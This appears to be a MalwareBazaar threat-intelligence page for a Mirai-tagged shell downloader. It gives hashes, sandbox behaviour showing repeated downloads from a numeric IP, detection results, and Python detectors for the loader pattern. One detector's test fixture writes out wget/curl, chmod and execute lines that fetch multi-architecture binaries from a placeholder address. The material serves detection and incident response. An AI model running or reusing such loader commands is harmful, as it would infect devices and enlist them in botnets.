MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 03bf9dfee9ad7c87c06a2106f36b1b6ba8ae2c08b1eb3b0a28581f9fa9414e33. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Threat unknown


Vendor detections: 7



SHA256 hash: 03bf9dfee9ad7c87c06a2106f36b1b6ba8ae2c08b1eb3b0a28581f9fa9414e33
SHA3-384 hash: 784d06cce94a10d63809e453459e50eb5d47c737b70a60963c5bb6c917fc663f9420a76b06a042ef1c2b648c49813910
SHA1 hash: f41e8087dbd284c7db187078a41b22547ced136c
MD5 hash: a9458197291766ee95d15d8678dde539
humanhash: hydrogen-ink-floor-ink
File name: cat.sh
File size: 1'985 bytes
First seen: 2026-01-28 20:33:10 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 24:wbxDqkpMjpMiM/MGMIGZB4xj/RMRR0/xcL1/j/+Zy3ZMZZkhc1pzZcZ6u0RMZFZv:mMdMiM/MGMIVjXoT+Zy0Dlq
TLSH: T1DC4113ECD095534FD0C48D30747A658C72CB999E67EEBE24E483687A50C89443FDB636
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1)
      30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: abuse_ch
Tags: sh

Intelligence


File Origin
# of uploads: 1
# of downloads: 37
Origin country: DE
Vendor Threat Intelligence

No detections

Verdict: Likely Malicious
Threat level: 7.5/10
Confidence: 100%
Tags: mirai

Verdict: Malicious
File type: unix shell
Detections: HEUR:Trojan-Downloader.Shell.Agent.a
Status: terminated
Behavior Graph:
(Process tree recovered from the sandbox behavior graph; node GUIDs dropped, pids kept.)

/usr/bin/sudo (pid 2209)
  execve -> /tmp/sample.bin (pid 2218), the script under analysis, which runs the same download / chmod / execute cycle 14 times:
    /usr/bin/wget  x14, pids 2219, 2263, 2280, 2311, 2349, 2386, 2421, 2450, 2492, 2528, 2575, 2622, 2665, 2714 (flags: net, send-data, write-file)
    /usr/bin/chmod x14, pids 2243, 2275, 2305, 2344, 2381, 2418, 2444, 2485, 2524, 2560, 2617, 2660, 2708, 2767 (one after each download)
    /home/sandbox/herios.x86_64 (pid 2244, mprotect-exec) -> /usr/bin/dash (pid 2248) -> /usr/bin/pgrep (pid 2249)
    /home/sandbox/herios.i486 (pid 2561) -> /usr/bin/dash (pid 2563) -> /usr/bin/pgrep (pid 2564)
    /usr/bin/dash via clone x12, pids 2277, 2307, 2345, 2382, 2419, 2446, 2487, 2526, 2618, 2661, 2710, 2769 (after the other twelve chmod calls; no payload execution recorded for those downloads)

Network: all 14 wget processes connected to 84.54.37.191:80 and each sent one request of 137 to 141 bytes. Only the two payloads matching the sandbox's x86 architecture family (herios.x86_64, herios.i486) ran, and each immediately spawned a shell that called pgrep; the other twelve downloads are consistent with binaries built for other architectures that could not execute on the sandbox host.
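The process tree above is, in effect, a list of exec and connect events. The following Python is an added example (not part of the MalwareBazaar page, the sample, or any vendor's sandbox) of how to flag that loader pattern from such events: one parent that repeatedly spawns a downloader, then chmod, then either a freshly dropped binary or only a shell, with every downloader talking to the same address. The event list is constructed here from the pids, paths and destination shown in the graph (four of the fourteen cycles; the root's ppid is assumed); ProcEvent, ChainSummary and find_loader_chains are names chosen for this example.

```python
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
SHELLS = {"sh", "dash", "bash", "ash", "busybox"}
SYSTEM_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/lib/")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    exe: str                    # image path of the new process
    dst: Optional[str] = None   # "ip:port" if the process opened a connection


@dataclass
class ChainSummary:
    complete: int = 0    # download -> chmod -> dropped binary executed
    attempted: int = 0   # download -> chmod -> only a shell child (binary did not run)
    payloads: List[str] = field(default_factory=list)
    destinations: Dict[str, int] = field(default_factory=dict)


def find_loader_chains(events: List[ProcEvent], min_cycles: int = 2) -> Dict[int, ChainSummary]:
    """Return, per parent pid, the download/chmod/execute cycles it drove.

    Children are walked in pid order (spawn order) with a three-state machine;
    parents with fewer than min_cycles complete-or-attempted cycles are dropped.
    """
    children: Dict[int, List[ProcEvent]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.pid):
        children[ev.ppid].append(ev)

    result: Dict[int, ChainSummary] = {}
    for parent, kids in children.items():
        summary, state = ChainSummary(), "want_download"
        for ev in kids:
            name = ev.exe.rsplit("/", 1)[-1]
            if name in DOWNLOADERS:
                if ev.dst:
                    summary.destinations[ev.dst] = summary.destinations.get(ev.dst, 0) + 1
                state = "want_chmod"
            elif name == "chmod" and state == "want_chmod":
                state = "want_exec"
            elif state == "want_exec":
                if name in SHELLS:
                    summary.attempted += 1          # shell only: payload did not run
                elif not ev.exe.startswith(SYSTEM_DIRS):
                    summary.complete += 1           # dropped file outside system dirs ran
                    summary.payloads.append(ev.exe)
                state = "want_download"
            else:
                state = "want_download"
        if summary.complete + summary.attempted >= min_cycles:
            result[parent] = summary
    return result


# Constructed from the sandbox graph above (four of its fourteen cycles);
# ppid 1 for sudo is an assumption, the graph does not show it.
EVENTS = [
    ProcEvent(2209, 1, "/usr/bin/sudo"),
    ProcEvent(2218, 2209, "/tmp/sample.bin"),
    ProcEvent(2219, 2218, "/usr/bin/wget", "84.54.37.191:80"),
    ProcEvent(2243, 2218, "/usr/bin/chmod"),
    ProcEvent(2244, 2218, "/home/sandbox/herios.x86_64"),
    ProcEvent(2248, 2244, "/usr/bin/dash"),
    ProcEvent(2249, 2248, "/usr/bin/pgrep"),
    ProcEvent(2263, 2218, "/usr/bin/wget", "84.54.37.191:80"),
    ProcEvent(2275, 2218, "/usr/bin/chmod"),
    ProcEvent(2277, 2218, "/usr/bin/dash"),
    ProcEvent(2280, 2218, "/usr/bin/wget", "84.54.37.191:80"),
    ProcEvent(2305, 2218, "/usr/bin/chmod"),
    ProcEvent(2307, 2218, "/usr/bin/dash"),
    ProcEvent(2528, 2218, "/usr/bin/wget", "84.54.37.191:80"),
    ProcEvent(2560, 2218, "/usr/bin/chmod"),
    ProcEvent(2561, 2218, "/home/sandbox/herios.i486"),
    ProcEvent(2563, 2561, "/usr/bin/dash"),
    ProcEvent(2564, 2563, "/usr/bin/pgrep"),
]

if __name__ == "__main__":
    for pid, s in find_loader_chains(EVENTS).items():
        print(pid, s)
```

Only pid 2218 is reported: two complete cycles (herios.x86_64, herios.i486), two attempted ones, and four connections to 84.54.37.191:80. The same walk over a full auditd or eBPF exec/connect feed gives you the parent pid to kill and the destination to block, and the attempted/complete split separates a multi-arch loader from a script that downloads one tool and runs it.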

Verdict: Malicious
Threat: Trojan-Downloader.Shell.Agent
Threat name: Script-Shell.Downloader.Heuristic
Status: Malicious
First seen: 2026-01-28 20:33:31 UTC
File type: Text (Shell)
AV detection: 10 of 36 (27.78%)
Threat level: 2/5

Result
Malware family: n/a
Score: 7/10
Tags: antivm defense_evasion discovery execution linux persistence privilege_escalation upx
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Checks CPU configuration
Reads CPU attributes
Changes its process name
UPX packed file
Attempts to change immutable files
Checks hardware identifiers (DMI)
Creates/modifies Cron job
Enumerates running processes
File and Directory Permissions Modification
Deletes itself
Executes dropped EXE

Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Author: Anish Bogati
Description: Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference: MalwareBazaar sample lilin.sh
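The rule description names three traits: downloads from numeric IPs, chmod, and execution of payloads named for several architectures. The following Python is an added example (not the rule author's code, not MalwareBazaar's, and not the content of cat.sh) that applies the same technique to a script's text and also pulls out the IOCs a responder wants: addresses, URLs, payload names and architectures. The loader text it scans is constructed for this example; the payload stem "herios" is borrowed from the filenames the sandbox recorded above, 192.0.2.10 is an RFC 5737 documentation address, and scan_loader and LoaderReport are names chosen here.

```python
import re
from dataclasses import dataclass, field
from typing import Iterator, List

# Architecture suffixes used by multi-arch IoT loaders, longest first so that
# "x86_64" is not matched as "x86" and "arm7" not as "arm".
ARCH_SUFFIXES = sorted(
    ["x86_64", "x86", "i486", "i586", "i686", "arm", "arm5", "arm6", "arm7",
     "mips", "mipsel", "mpsl", "ppc", "sh4", "m68k", "spc", "arc"],
    key=len, reverse=True)

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s;&|\"']+")
DOWNLOADER_RE = re.compile(r"^(?:wget|curl|tftp|ftpget)$")
CHMOD_RE = re.compile(r"^chmod\s+(?:[+a-z]+|[0-7]{3,4})\s+")
PAYLOAD_RE = re.compile(r"([A-Za-z0-9_-]+)\.(" + "|".join(ARCH_SUFFIXES) + r")$")
SEPARATOR_RE = re.compile(r";|&&|\|\||\||&")


@dataclass
class LoaderReport:
    ips: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)
    payloads: List[str] = field(default_factory=list)   # <stem>.<arch> names seen
    arches: List[str] = field(default_factory=list)
    ip_downloads: int = 0
    chmods: int = 0
    execs: int = 0
    matched: bool = False


def _commands(script: str) -> Iterator[List[str]]:
    """Yield argv lists: split lines on ; && || | &, skip comments, unwrap busybox."""
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for piece in SEPARATOR_RE.split(line):
            argv = piece.split()
            if argv and argv[0] == "busybox" and len(argv) > 1:
                argv = argv[1:]                 # "busybox wget ..." -> "wget ..."
            if argv:
                yield argv


def _basename(token: str) -> str:
    return token.rsplit("/", 1)[-1]


def scan_loader(script: str, min_arches: int = 3) -> LoaderReport:
    rep = LoaderReport()
    ips, urls, payloads, arches = set(), set(), set(), set()
    for argv in _commands(script):
        head = _basename(argv[0])
        line = " ".join(argv)
        for tok in argv:                        # any <stem>.<arch> token is a payload reference
            m = PAYLOAD_RE.search(_basename(tok))
            if m:
                payloads.add(m.group(0))
                arches.add(m.group(2))
        if DOWNLOADER_RE.match(head):
            found = IP_RE.findall(line)
            if found:                           # download addressed by numeric IP
                rep.ip_downloads += 1
                ips.update(found)
            urls.update(URL_RE.findall(line))
        elif CHMOD_RE.match(line):
            rep.chmods += 1
        else:                                   # "./x.arm7" or "sh x.arm7" executes a payload
            target = argv[1] if head in ("sh", "bash") and len(argv) > 1 else argv[0]
            if PAYLOAD_RE.search(_basename(target)):
                rep.execs += 1
    rep.ips, rep.urls = sorted(ips), sorted(urls)
    rep.payloads, rep.arches = sorted(payloads), sorted(arches)
    # all three traits must be present, and for several architectures
    rep.matched = (rep.ip_downloads > 0 and rep.chmods > 0 and rep.execs > 0
                   and len(arches) >= min_arches)
    return rep


# Constructed inputs for the example (not the MalwareBazaar sample's content).
LOADER = """#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
wget http://192.0.2.10/bins/herios.x86_64 -O herios.x86_64; chmod 777 herios.x86_64; ./herios.x86_64; rm -f herios.x86_64
busybox wget http://192.0.2.10/bins/herios.i486 -O herios.i486; chmod 777 herios.i486; ./herios.i486; rm -f herios.i486
curl -s http://192.0.2.10/bins/herios.arm7 -o herios.arm7; chmod +x herios.arm7; ./herios.arm7; rm -f herios.arm7
wget http://192.0.2.10/bins/herios.mips -O herios.mips; chmod 777 herios.mips; ./herios.mips; rm -f herios.mips
wget http://192.0.2.10/bins/herios.mipsel -O herios.mipsel; chmod 777 herios.mipsel; ./herios.mipsel; rm -f herios.mipsel
"""

BENIGN = """#!/bin/sh
wget https://example.com/tool-1.2.tar.gz -O /tmp/tool.tar.gz
tar xzf /tmp/tool.tar.gz -C /opt
chmod +x /opt/tool/bin/tool
/opt/tool/bin/tool --version
"""

if __name__ == "__main__":
    print(scan_loader(LOADER))
    print(scan_loader(BENIGN))
```

The three conditions are ANDed, as in the rule, so the benign installer (hostname over HTTPS, one chmod, no architecture-suffixed names) does not fire even though it also downloads and chmods. The report's ips and urls are the IOCs to compare against what the sandbox saw (here 84.54.37.191:80); this scanner complements the YARA rule rather than replacing it, since YARA runs inside MalwareBazaar and on endpoints where Python may not.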

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download

sh 03bf9dfee9ad7c87c06a2106f36b1b6ba8ae2c08b1eb3b0a28581f9fa9414e33 (this sample)

Delivery method: Distributed via web download
